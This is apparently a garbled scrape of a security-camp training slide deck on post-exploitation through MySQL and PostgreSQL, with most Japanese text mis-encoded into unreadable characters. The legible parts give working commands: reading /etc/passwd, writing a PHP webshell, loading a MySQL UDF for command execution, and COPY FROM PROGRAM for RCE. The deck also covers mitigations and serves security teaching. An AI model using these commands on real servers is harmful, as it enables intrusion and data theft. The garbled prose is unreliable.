Learn the essential way of thinking about vulnerabilities through post-exploitation on middlewares (MySQL/PostgreSQL編)/seccamp2020-b8

ηΩϡϦςΟɾΩϟϯϓશࠃେձ2020ΦϯϥΠϯ Learn the essential way of thinking about vulnerabilities through
post-exploitation on middlewares (MySQL/PostgreSQLฤ) Taichi Kotake (@tkmru) Teppei Fukuda (@knqyf263)

͜ͷεϥΠυ͸.Z42-1PTUHSF42-ฤͰ͢ ຊฤ3FEJTฤ͸εϥΠυ֓ཁͷϦϯΫࢀর !ULNSV࡞੒

ࣗݾ঺հ w ໊લɿ5BJDIJ,PUBLF !ULNSV w ॴଐɿגࣜձࣾΞΧπΩ ɹɹɹηΩϡϦςΟΤϯδχΞ w ॴࡏ஍ɿ౦ژ
w ஶॻ w 8&# %#13&447PM ಛूπʔϧͰ؆୯ʂ͸͡Ίͯͷ੬ऑੑௐࠪʢٕज़ධ࿦ࣾʣ w ϦόʔεΤϯδχΞϦϯάπʔϧ(IJESB࣮ફΨΠυʢϚΠφϏग़൛ʣ

%#αʔόʹϩάΠϯͰ͖ͨ৔߹ Կ͕Ͱ͖Δ͔ʁ

࠷ॳʹࢥ͍ͭ͘΍ͭ QPTUFYQMPJUBUJPOPOUIF%#TFSWFS "UUBDLFS 42-จΛ࣮ߦ σʔλΛऔಘ %#4FSWFS Πϯλʔωοτ্ʹϦʔΫ μʔΫ΢ΣϒͰൢച ඃ֐اۀʹۚમཁٻͳͲ

ຊ౰ʹͦΕ͚ͩʁ

%#αʔό͔ΒͰ͖Δ͜ͱ w ςʔϒϧͷఆٛσʔλ͕ಡΈऔΓՄೳ w αʔό಺ͷϑΝΠϧΛಡΈऔΓՄೳ w αʔό಺΁ϑΝΠϧΛΞοϓϩʔυՄೳ w 3$&ʢ3FNPUF$PEF&YFDVUJPOʣ w
ϦϞʔτ͔Βαʔό্Ͱ೚ҙͷίʔυΛ࣮ߦ͢Δ͜ͱ QPTUFYQMPJUBUJPOPOUIF%#TFSWFS

%#αʔό͔ΒͰ͖Δ͜ͱ w ςʔϒϧͷఆٛσʔλ͕ಡΈऔΓՄೳ w αʔό಺ͷϑΝΠϧΛಡΈऔΓՄೳ w αʔό಺΁ϑΝΠϧΛΞοϓϩʔυՄೳ w 3$&ʢ3FNPUF$PEF&YFDVUJPOʣ QPTUFYQMPJUBUJPOPOUIF%#TFSWFS
%#ͷػೳΛ׆༻͢Δ͜ͱͰΑΓඃ֐Λ֦େͰ͖Δʂ

αʔό಺ͷϑΝΠϧΛಡΈऔΓՄೳ w %#ͷػೳΛ࢖͏͜ͱͰɺαʔό಺ͷϑΝΠϧΛಡΈऔΓՄೳ w %#αʔόʹϩάΠϯͯ͠ɺϓϩϯϓτ্Ͱ42-จίϚϯυΛ࣮ߦ͢Δͱ ಡΈऔΓͰ͖Δʢ.Z42- 1PTUHSF42-ʣ w 3FEJTͰ͸Ͱ͖ͳ͍ɻɻɻ w
%#Λಈ͔͍ͯ͠ΔϢʔβ͕ಡΈऔΓՄೳͳύʔϛογϣϯ͕͍͍ͭͯΔ ϑΝΠϧͷΈ QPTUFYQMPJUBUJPOPOUIF%#TFSWFS

ϑΝΠϧಡΈऔΓ͔ΒͲͷΑ͏ʹൃలͤ͞Δ͔ w FUDQBTTXE؅ཧऀݖݶͳ͠ͰϢʔβҰཡ͕ݟΕΔ w 8FCΞϓϦ͕Ұॹʹಈ͍͍ͯΔ৔߹ɺιʔείʔυΛୣऔͰ͖Δ͔΋ w ࣾ಺ֶ಺ͷ1$্ʹཱ͍ͬͯΔ%#ʹ৵ೖͰ͖ͨ৔߹ɺ%PXOMPBETϑΥϧμͳ Ͳ͔ΒॏཁͳϑΝΠϧΛಡΈऔΓͰ͖Δ͔΋ w ͳΜΒ͔ͷαʔϏεͷ"1*Ωʔ
w ࣾ֎ൿͷࢿྉͳͲ QPTUFYQMPJUBUJPOPOUIF%#TFSWFS

ಡΈ͍͚ͨͲͳ͔ͳ͔ಡΊͳ͍ϑΝΠϧ w FUDTIBEPX w ϩάΠϯύεϫʔυͷϋογϡ͕ॻ͔Ε͍ͯΔ w ಡΈऔΓʹ͸؅ཧऀݖݶ͕ඞཁ w dTTIൿີ伴໊ w
44)ͷൿີ伴 w ࢖༻࣌ʹDINPEΛઃఆ͞Ε͍ͯΔ w 44)Λ࢖͍ͬͯΔϢʔβݖݶPS؅ཧऀݖݶͰͳ͍ͱಡΊͳ͍ QPTUFYQMPJUBUJPOPOUIF%#TFSWFS

αʔό΁ϑΝΠϧΛΞοϓϩʔυՄೳ QPTUFYQMPJUBUJPOPOUIF%#TFSWFS w %#ͷػೳΛ࢖͏͜ͱͰɺαʔό಺΁ϑΝΠϧΛΞοϓϩʔυՄೳ w %#αʔόʹϩάΠϯͯ͠ɺϓϩϯϓτ্Ͱ42-จίϚϯυΛ࣮ߦ͢Δͱ ॻ͖ࠐΈͰ͖Δʢ.Z42- 1PTUHSF42- 3FEJTʣ w
ॻ͖ࠐΈՄೳͳύʔϛογϣϯ͕͍͍ͭͯΔσΟϨΫτϦͷΈ

ϑΝΠϧॻ͖ࠐΈ͔ΒͲͷΑ͏ʹൃలͤ͞Δ͔ w DSPOUBCϑΝΠϧͷॻ͖ࠐΈ w ίϚϯυΛ࣮ߦ͢ΔDSPOδϣϒΛఆظతʹ࣮ߦ͢ΔͨΊͷ࢓૊Έ w γΣϧͷΑ͏ʹΠϯλϥΫςΟϒͰ͸ͳ͍͕ίϚϯυΛ࣮ߦͰ͖Δ QPTUFYQMPJUBUJPOPOUIF%#TFSWFS

DSPOUBC͸Ϛϧ΢ΣΞͷӬଓԽʹ࢖ΘΕΔ w Ϛϧ΢ΣΞͷӬଓԽ w ۦআ͞Εͳ͍Α͏ʹɺࣗಈ࣮ߦ΍μ΢ϯϩʔυΛ܁Γฦ͠ߦ͏ w &-'Ϛϧ΢ΣΞͰ͸DSPOδϣϒ͕Α͘࢖ΘΕΔ w Ϛϧ΢ΣΞΛμ΢ϯϩʔυ࣮ߦ͢ΔδϣϒΛઃఆ͓ͯ͘͠ w
Ϛϧ΢ΣΞͷόΠφϦΛফڈ͢Δ͚ͩͰ͸Կ౓Ͱ΋෮׆͢Δ QPTUFYQMPJUBUJPOPOUIF%#TFSWFS

ϑΝΠϧॻ͖ࠐΈ͔ΒͲͷΑ͏ʹൃలͤ͞Δ͔ w 8FCΞϓϦέʔγϣϯ͕ಈ͍͍ͯΔ৔߹ɺεΫϦϓτ͕ஔ͔Ε͍ͯΔύε͕ ෼͔Ε͹8FCTIFMMΛ഑ஔՄೳ w ύϥϝʔλͰࢦఆ͞ΕͨίϚϯυΛ࣮ߦ͢ΔΞϓϦέʔγϣϯΛಈ͔͢ w ϒϥ΢β΍DVSMίϚϯυ͔ΒγΣϧͷΑ͏ʹѻ͑Δʂ QPTUFYQMPJUBUJPOPOUIF%#TFSWFS

8FCTIFMMͷྫ w 1)1Ͱͷྫ QIQTZTUFN @(&5<DNE> w (&5ύϥϝʔλʹࢦఆ͞ΕͨίϚϯυΛTZTUFNؔ਺Ͱ࣮ߦ w
ϒϥ΢β্ͰίϚϯυΛ࣮ߦՄೳʂʂʂ QPTUFYQMPJUBUJPOPOUIF%#TFSWFS

%#ͷػೳΛ࢖ͬͯ3$&ʹ࣋ͪࠐΉํ๏ w .Z42- w 6%'&YQMPJUBUJPO w 1PTUHSFT%# w $01:50'30.130(3". w
3FEJT w 3&1-*$"0' QPTUFYQMPJUBUJPOPOUIF%#TFSWFS ͜Ε͔Β%#ຖʹςΫχοΫΛ ղઆ͠·͢ʂʂʂ

.Z42-ฤ

αʔό಺ͷϑΝΠϧͷಡΈऔΓ .Z42- w -0"%@'*-&ؔ਺ʹΑͬͯαʔόʹΞοϓϩʔυͨ͠ϑΝΠϧͷ಺༰Λ จࣈྻͱͯ͠औಘՄೳ w ݁Ռ͕ΞεΩʔίʔυͰฦ͞ΕΔ৔߹͸$0/7&35ؔ਺ͰจࣈίʔυΛม׵ mysql> select load_file('/etc/passwd');
mysql> select convert(load_file('/etc/passwd') using utf8);

αʔό΁ϑΝΠϧΛΞοϓϩʔυ .Z42- w 4&-&$5*/50065'*-&ߏจʹΑͬͯॻ͖ࠐΈՄೳ mysql> select '<?php system($_GET["cmd"]);?>'  -> into
outfile '/var/www/html/shell.php'; mysql> select from_base64('c2VjY2FtcCB0cmFjayBiCg==')   -> into dumpfile "hoge.so"; w େ͖͍ϑΝΠϧΛΞοϓϩʔυ͍ͨ͠ͱ͖͸#BTFʹҰ౓ม׵͢Δ

TFDVSF@GJMF@QSJWʹΑΔ੍ݶ w TFDVSF@pMF@QSJW͸ϑΝΠϧΛॻ͖ࠐΈಡΈࠐΈ͢Δࡍʹɺ࢖༻ՄೳͳσΟ ϨΫτϦΛ੍ݶ͢Δઃఆ߲໨ w ࢦఆ͞ΕͨσΟϨΫτϦʹ͋ΔϑΝΠϧ͔͠ૢ࡞Ͱ͖ͳ͘ͳΔͨΊɺ ద੾ʹઃఆ͞Ε͍ͯΔͱϑΝΠϧΛಡΊͳ͍ .Z42-

TFDVSF@GJMF@QSJWʹΑΔ੍ݶ w Ҏ߱Ͱ͸σϑΥϧτͰTFDVSF@pMF@QSJWʹద੾ͳύε͕ઃఆ͞Ε͍ͯΔ ͨΊɺ࠷ۙͰ͸೚ҙͷϑΝΠϧΛಡΈࠐΈॻ͖ࠐΈͰ͖Δϗετ͸গͳ͍ .Z42- mysql> show variables like "secure_file_priv";
  +------------------+-----------------------+  | Variable_name | Value |  +------------------+-----------------------+  | secure_file_priv | /var/lib/mysql-files/ |  +------------------+-----------------------+ 1 row in set (0.00 sec)

TFDVSF@GJMF@QSJWͷσϑΥϧτ஋ w .Z42-ެࣜ%PDLFSΠϝʔδͷσϑΥϧτ஋͸/6-- w EPDLFSSVO࣌ʹTFDVSFpMFQSJWͰઃఆՄೳ w /6--Ͱ͸ɺͲͷσΟϨΫτϦʹ΋ಡΈॻ͖Ͱ͖ͳ͍ w खಈͰΠϯετʔϧͨ͠৔߹ɺσϑΥϧτ஋͸WBSMJCNZTRMpMFT w
ςʔϒϧͷ಺༰Λ$47ɺ595౳ʹग़ྗ͢ΔࡍͳͲʹ࢖ΘΕΔσΟϨΫτϦ w ߈ܸऀ໨ઢͩͱಡΈॻ͖Ͱ͖ͯ΋ָ͘͠ͳ͍ɻɻɻ .Z42-

.Z42-6%'&YQMPJUBUJPO 8IBUT6%' w 6%' 6TFS%FpOFE'VODUJPO ͸Ϣʔβ͕ࣗ༝ʹ.Z42-ʹؔ਺Λ௥Ճ͢Δͨ Ίͷػೳ w QMVHJOEJSʹࢦఆ͞Ε͍ͯΔσΟϨΫτϦʹ഑ஔͨ͠ڞ༗ϥΠϒϥϦ಺ͷؔ਺ Λɺ.Z42-ͷؔ਺ͱͯ͠࢖༻Ͱ͖Δ
mysql> select @@plugin_dir;  +------------------------+ | @@plugin_dir |  +------------------------+ | /usr/lib/mysql/plugin/ |  +------------------------+ 1 row in set (0.00 sec)

.Z42-6%'&YQMPJUBUJPO 8IBUT6%' w QMVHJOEJSʹ༻ҙͨ͠ڞ༗ϥΠϒϥϦΛΞοϓϩʔυͰ͖Ε͹ ༻ҙͨؔ͠਺Λ࣮ߦՄೳ w ྫ͑͹ɺҾ਺ʹࢦఆͨ͠ίϚϯυΛ࣮ߦ͢Δؔ਺Λ༻ҙ͓ͯ͘͠ͱɺɺɺ ޷͖ͳίϚϯυΛ࣮ߦͰ͖Δʂʂ w 3$&ʂʂ

߈ܸͷྲྀΕ "UUBDLFS .Z42-4FSWFS QMVHJOEJS΁ڞ༗ϥΠϒϥϦΛ Ξοϓϩʔυ ڞ༗ϥΠϒϥϦ಺ͷؔ਺Λ 6%'ͱͯ͠ొ࿥ ొ࿥ͨؔ͠਺Λ࣮ߦ .Z42-6%'&YQMPJUBUJPO

.Z42-6%'&YQMPJUBUJPO MJC@NZTRMVEG@TZT@TP w Ξοϓϩʔυ͢Δڞ༗ϥΠϒϥϦʹ͸ɺ.FUBTQMPJUʹ૊Έࠐ·Ε͍ͯΔ MJC@NZTRMVEG@TZT@TP͕࢖͑Δ w IUUQTHJUIVCDPNSBQJENFUBTQMPJUGSBNFXPSLUSFFNBTUFSEBUB FYQMPJUTNZTRM w Ҿ਺ʹࢦఆ͞ΕͨίϚϯυΛ࣮ߦ͢ΔTZT@FWBMؔ਺͕༻ҙ͞Ε͍ͯΔ

.Z42-6%'&YQMPJUBUJPO 6%'Λొ࿥ mysql> select from_base64('f0VMRgIBAQAA<লུ>AAAA') into dumpfile "/usr/lib/mysql/ plugin/lib_mysqludf_sys_64.so"; Query
OK, 1 row affected (0.01 sec)    mysql> create function sys_eval returns string soname 'lib_mysqludf_sys_64.so'; Query OK, 0 rows affected (0.00 sec) -----------------------+ | @@plugin_dir |  +------------------------+ | /usr/lib/mysql/plugin/ |  +------------------------+ 1 row in set (0.00 sec) w MJC@NZTRMVEG@TZT@TPΛ#BTFʹม׵ͯ͠Ξοϓϩʔυ w $3&"5&'6/$5*0/ߏจͰϥΠϒϥϦ಺ͷؔ਺Λొ࿥

.Z42-6%'&YQMPJUBUJPO 6%'Λ࣮ߦ w ొ࿥ͨؔ͠਺ʢTZT@FWBMʣΛ࣮ߦͰ͖Δʂ w JEίϚϯυΛ࣮ߦ͢Δྫ mysql> select convert(sys_eval('id') using
utf8);  +-------------------------------------------------+  | convert(sys_eval('id') using utf8) |  +-------------------------------------------------+  | uid=999(mysql) gid=999(mysql) groups=999(mysql) |  +-------------------------------------------------+  1 row in set (0.01 sec)

.Z42-6%'&YQMPJUBUJPOͷ໰୊఺ w TFDVSFpMFQSJWͷ͍ͤͰݱ୅Ͱ͸ࢗ͞Βͳ͍ɻɻɻ w QMVHJOEJSʹڞ༗ϥΠϒϥϦΛΞοϓϩʔυͰ͖ͳ͍ mysql> select from_base64('f0VMRgIBAQAA<লུ>AAAA')   ->
into dumpfile "/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so"; ERROR 1290 (HY000): The MySQL server is running with the --secure- file-priv option so it cannot execute this statement

1PTUHSFT42-ฤ

αʔό಺ͷϑΝΠϧͷಡΈऔΓ 1PTUHSFT42- w $01:'30.ίϚϯυϑΝΠϧ͔Βςʔϒϧ΁ͱσʔλΛ౉͢ postgres=# create table test(t text);  postgres=#
copy test from '/etc/passwd';  postgres=# select * from test;

αʔό΁ϑΝΠϧΛΞοϓϩʔυ 1PTUHSFT42- w $01:50ίϚϯυςʔϒϧ͔ΒϑΝΠϧ΁ͱσʔλΛ౉͢ w #BTFʹม׵͢Δ͜ͱͰେ͖͍ϑΝΠϧΛΞοϓϩʔυՄೳ postgres=# copy (select convert_from( 
postgres(# decode('c2VjY2FtcCB0cmFjayBiCg==','base64'),'utf-8'))  postgres-# to '/tmp/hoge.so' postgres=# copy (select '<?php system($_GET["cmd"]);?>')   postgres-# to '/var/www/html/shell.php';

1PTUHSFT%#$01:50'30.130(3". 8IBUT$01:50'30.130(3". w $01:50'30.ίϚϯυʹ130(3".Λࢦఆ͢Δ͜ͱͰ ίϚϯυΛ࣮ߦͰ͖Δ w $01:50ίϚϯυςʔϒϧ͔ΒϑΝΠϧ΁ͱσʔλΛ౉͢ w $01:'30.ίϚϯυϑΝΠϧ͔Βςʔϒϧ΁ͱσʔλΛ౉͢

1PTUHSFT%#$01:50'30.130(3". 8IBUT$01:50'30.130(3". w $01:50'30.ίϚϯυʹ130(3".Λࢦఆ͢Δ͜ͱͰ ίϚϯυΛ࣮ߦͰ͖Δ w $01:50ίϚϯυ 130(3". ςʔϒϧ͔Βࢦఆ͞ΕͨίϚϯυ΁ͱσʔλΛ౉͢ w
$01:'30.ίϚϯυ 130(3". ࢦఆ͞ΕͨίϚϯυͷ࣮ߦ݁ՌΛςʔϒϧ΁ͱ౉͢

1PTUHSFT%#$01:50'30.130(3". "UUBDLFS 1PTUHSFT%#4FSWFS ࣮ߦ݁ՌΛ֨ೲ͢Δ ςʔϒϧΛ࡞੒୳ࡧ $01:'30.ίϚϯυ࣮ߦ 4&-&$5จʹΑΓ ࣮ߦ݁Ռऔಘ ߈ܸϑϩʔ

w 1PTUHSF42-ͷެࣜ%PDLFSΠϝʔδΛىಈ͠ɺQTRMͰϩάΠϯ͠·͢ $ docker run --name postgres-camp -e POSTGRES_PASSWORD=<ύεϫʔυΛࢦఆ> -p
127.0.0.1:5432:5432 -d postgres:13.1  $ psql -U postgres -h localhost  Password for user postgres:   psql (13.0, server 13.1 (Debian 13.1-1.pgdg100+1))  Type "help" for help.    postgres=# ࣮ࡍʹ΍ͬͯΈΔ (1/2) ؀ڥ४උ

w JEίϚϯυΛ࣮ߦ͢Δྫ ࣮ࡍʹ΍ͬͯΈΔ (2/2) 3$& postgres=# create table cmd_exec(cmd_output text); 
CREATE TABLE postgres=# copy cmd_exec from program 'id';  COPY 1 postgres=# select * from cmd_exec;  cmd_output   ------------------------------------------------------------------------  uid=999(postgres) gid=999(postgres) groups=999(postgres),101(ssl-cert)  (1 row)

1PTUHSFT%#$01:50'30.130(3".ͷར఺ w ΍ͬͯΈͯ෼͔ͬͨ௨Γɺ σϑΥϧτઃఆͷ1PTUHSFT%#Ͱར༻Մೳʂʂ

ͳ੍ͥݶ͞Ε͍ͯͳ͍ͷ͔

1PTUHSFT%#$01:50'30.130(3". OPU$7&ʁ w ͜ͷػೳʹΑΔ04ίϚϯυΠϯδΣΫγϣϯ͸ɺ$7&ͱͯ͠$7&ʹ࠾ ൪͞Ε͔͚ͨ w ͔͠͠ɺ1PTUHSF42-ͷηΩϡϦςΟνʔϜ͸੬ऑੑͱೝΊ͓ͯΒͣɺ୯ͳΔػೳͩ ͱओு͓ͯ͠Γɺ࠷৽൛ͷ1PTUHSF42-Ͱ΋༗ޮ w 1PTUHSF42-αʔό͸SPPUϢʔβ͔Β͸ಈ͔ͤͳ͍Α͏ʹͳ͍ͬͯΔ
w $01:50'30.130(3".΋1PTUHSF42-Λಈ͔͢ϢʔβͱಉҰݖݶͰ͔͠ಈ ࡞͠ͳ͍ w ͦ΋ͦ΋ऑ͍ೝূΛઃఆ͠ͳ͍͜ͱͰ๷͛Δɻ͜ͷػೳ͕ѱ͍Θ͚Ͱ͸ͳ͍

Learn the essential way of thinking about vulne...

Learn the essential way of thinking about vulnerabilities through post-exploitation on middlewares (MySQL/PostgreSQL編)/seccamp2020-b8

More Decks by @tkmru

Other Decks in Programming

Featured

Transcript